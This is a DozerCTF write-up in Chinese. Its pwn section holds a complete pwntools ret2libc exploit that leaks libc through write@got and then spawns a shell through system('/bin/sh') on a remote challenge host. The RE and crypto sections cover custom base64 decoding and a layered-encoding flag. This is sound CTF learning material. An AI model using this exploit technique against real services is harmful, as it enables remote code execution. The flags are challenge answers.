DozerCTF Writeup

pwn - ret2 temp

一開始記得不是這個題目名字，應該是 ret2dl-resolve ，高大上東西不會

分析

保護情況

32 位動態鏈接；打開 NX ；

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

漏洞函數

read 函數棧溢出

ssize_t vuln()
{
  char buf; // [esp+Ch] [ebp-6Ch]

  setbuf(stdin, &buf);
  return read(0, &buf, 0x100u);
}

思路

泄露 libc

棧溢出，用 write 泄露 libc 地址：

payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)

get shell

到 libc-database 查遠程的 libc 是：libc6-i386_2.23-0ubuntu11_amd64.so 。

payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(system) + p32(0xdeadbeef) + p32(binsh)

exp

from pwn import *
context.log_level = 'debug'

#p = process("./pwn")
p = remote("118.31.11.216",36666)
elf = ELF("./pwn")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
libc = ELF("./libc.so")

main_addr = 0x0804851f
write_plt = elf.plt['write']
log.info("write_plt:"+hex(write_plt))
write_got = elf.got['write']
log.info("write_got:"+hex(write_got))

payload = 'a'*0x6c+p32(0xdeadbeef)
payload += p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)


p.recvuntil("!\n")
p.send(payload)

write_leak = u32(p.recv(4))
log.info("write_leak:"+hex(write_leak))

libc_base = write_leak - libc.symbols['write']
log.info("libc_base:"+hex(libc_base))

system = libc_base + libc.symbols['system']
log.info("system:"+hex(system))

binsh = libc_base + libc.search('/bin/sh').next()
log.info("binsh:"+hex(binsh))

#onegadget = 0x3ac5c + libc_base
#log.info("onegadget:"+hex(onegadget))

payload = 'a'*0x6c+p32(0xdeadbeef)
#payload += p32(0x08048362) + p32(onegadget)
payload += p32(system) + p32(0xdeadbeef) + p32(binsh)

p.recvuntil("!\n")
#gdb.attach(p)
p.send(payload)

p.interactive()

RE - 貌似有些不對

上面字符串 base 加密，下面自定義 自定義密碼錶 ：

解密腳本：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : MrSkYe
# @Email   : [email protected]
# @File    : base_diy.py

# 自定義加密表
#s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"#原版
s = "ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/"#自定義

def My_base64_encode(inputs):
	# 將字符串轉化爲2進制
	bin_str = []
	for i in inputs:
		x = str(bin(ord(i))).replace('0b', '')
		bin_str.append('{:0>8}'.format(x))
	#print(bin_str)
	# 輸出的字符串
	outputs = ""
	# 不夠三倍數，需補齊的次數
	nums = 0
	while bin_str:
		#每次取三個字符的二進制
		temp_list = bin_str[:3]
		if(len(temp_list) != 3):
			nums = 3 - len(temp_list)
			while len(temp_list) < 3:
				temp_list += ['0' * 8]
		temp_str = "".join(temp_list)
		#print(temp_str)
		# 將三個8字節的二進制轉換爲4個十進制
		temp_str_list = []
		for i in range(0,4):
			temp_str_list.append(int(temp_str[i*6:(i+1)*6],2))
		#print(temp_str_list)
		if nums:
			temp_str_list = temp_str_list[0:4 - nums]
			
		for i in temp_str_list:
			outputs += s[i]
		bin_str = bin_str[3:]
	outputs += nums * '='
	print("Encrypted String:\n%s "%outputs)
	
def My_base64_decode(inputs):
	# 將字符串轉化爲2進制
	bin_str = []
	for i in inputs:
		if i != '=':
			x = str(bin(s.index(i))).replace('0b', '')
			bin_str.append('{:0>6}'.format(x))
	#print(bin_str)
	# 輸出的字符串
	outputs = ""
	nums = inputs.count('=')
	while bin_str:
		temp_list = bin_str[:4]
		temp_str = "".join(temp_list)
		#print(temp_str)
		# 補足8位字節
		if(len(temp_str) % 8 != 0):
			temp_str = temp_str[0:-1 * nums * 2]
		# 將四個6字節的二進制轉換爲三個字符
		for i in range(0,int(len(temp_str) / 8)):
			outputs += chr(int(temp_str[i*8:(i+1)*8],2))
		bin_str = bin_str[4:]	
	print("Decrypted String:\n%s "%outputs)
	
print()
print("     *************************************")
print("     *    (1)encode         (2)decode    *")	
print("     *************************************")
print()


num = input("Please select the operation you want to perform:\n")
if(num == "1"):
	input_str = input("Please enter a string that needs to be encrypted: \n")
	My_base64_encode(input_str)
else:
	input_str = input("Please enter a string that needs to be decrypted: \n")
	My_base64_decode(input_str)

Crypto - 真·簽到

給的一個程序，運行不起來，IDA 打開就很奇怪，然後隨手往記事本一帶，發現一串字符串。看這樣子像是 base 64 ：

R00yVE1NWlRIRTJFRU5CWUdVM1RNUlJURzRaVEtOUllHNFpUTU9CV0lJM0RRTlJXRzQ0VE9OSlhHWTJET05aUkc1QVRPTUJUR0kyRUVNWlZHNDNUS05aWEc0MlRHTkpaR1pBVElNUldHNDNUT05KVUc0M0RPTUJXR0kyRUtOU0ZHTTRUT09CVUc0M0VFPT09Cgo=

加密之後長這樣：

GM2TMMZTHE2EENBYGU3TMRRTG4ZTKNRYG4ZTMOBWII3DQNRWG44TONJXGY2DONZRG5ATOMBTGI2EEMZVG43TKNZXG42TGNJZGZATIMRWG43TONJUG43DOMBWGI2EKNSFGM4TOOBUG43EE===

然後聯想 base 32 的佔位符（也就是 = ）的可能是 6、4、3、1 個，又順手解密後：

3563394B48576F37356873686B686679757647717A70324B3577577753596A426777547670624E6E3978476B

然後就是 16 進制轉換字符串：

5c9KHWo75hshkhfyuvGqzp2K5wWwSYjBgwTvpbNn9xGk

然後再轉一個 base 58 ：

Dozerctf{base_family_is_so_good}

其實這種多重加密，用 CyberChef 能自動解出來一部分，這題的最後兩步就是自動解出來的：

點擊下面鏈接可以查看整個解密流程：
https://skyedai910.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Hex('None')From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)&input=UjAweVZFMU5XbFJJUlRKRlJVNUNXVWRWTTFSTlVsSlVSelJhVkV0T1VsbEhORnBVVFU5Q1YwbEpNMFJSVGxKWFJ6UTBWRTlPU2xoSFdUSkVUMDVhVWtjMVFWUlBUVUpVUjBreVJVVk5XbFpITkROVVMwNWFXRWMwTWxSSFRrcGFSMXBCVkVsTlVsZEhORE5VVDA1S1ZVYzBNMFJQVFVKWFIwa3lSVXRPVTBaSFRUUlVUMDlDVlVjME0wVkZQVDA5Q2dvPQ